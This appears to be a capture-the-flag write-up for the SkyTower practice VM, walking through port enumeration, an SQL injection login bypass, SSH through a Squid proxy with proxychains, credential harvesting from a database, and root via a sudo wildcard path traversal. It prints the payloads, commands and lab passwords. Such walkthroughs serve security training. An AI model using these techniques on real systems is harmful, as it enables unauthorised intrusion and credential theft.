syn A virtual machine designed by Telspace Systems.Enumeration
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 52
80/tcp open http syn-ack ttl 52
554/tcp open rtsp syn-ack ttl 64
3128/tcp open squid-http syn-ack ttl 52
7070/tcp open realserver syn-ack ttl 64Let’s start with port 80:
Foothold
We can use SQLi to get into the login page:
' || 1=1#I did try using other methods however only the OR operator gave me any luck:
User own
We can try SSH as the user but we only get a message sent back to us:
In the original version, port 22 isn’t even accessible so I’m going to continue as if that were the case
There is one other service open to us which is squid-proxy, let’s try routing traffic through there:
http 163.172.228.173 3128We then want to SSH to localhost:
We still get the same message, we can add /bin/bash to the end and get a shell
proxychains ssh john@localhost /bin/bashRoot own
We have a few other users available to use that we can try use for priv esc:
We can enumerate the box a little further, such as the web directories, and see a login.php file. This contains database creds we can use:
We need to get an interactive terminal, however the box doesn’t give us a great deal of options. I tried using sh -i to get an interactive shell which helped a bit however mysql didn’t work. We can bypass this redirection by deleting .bashrc:
We can then move onto our database:
mysql -u root -p
use SkyTech;
select * from login; We get a few logins, the most interesting is sara:ihatethisjob, we can su over to sara (if you ssh, make sure you remove .bashrc like earlier) and find some sudo entries:
Matching Defaults entries for sara on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*This is pretty easy to attach, the wild card lets us traverse directories and read flags:
sudo /bin/cat /accounts/../root/flag.txtWe also get root’s password, theskytower
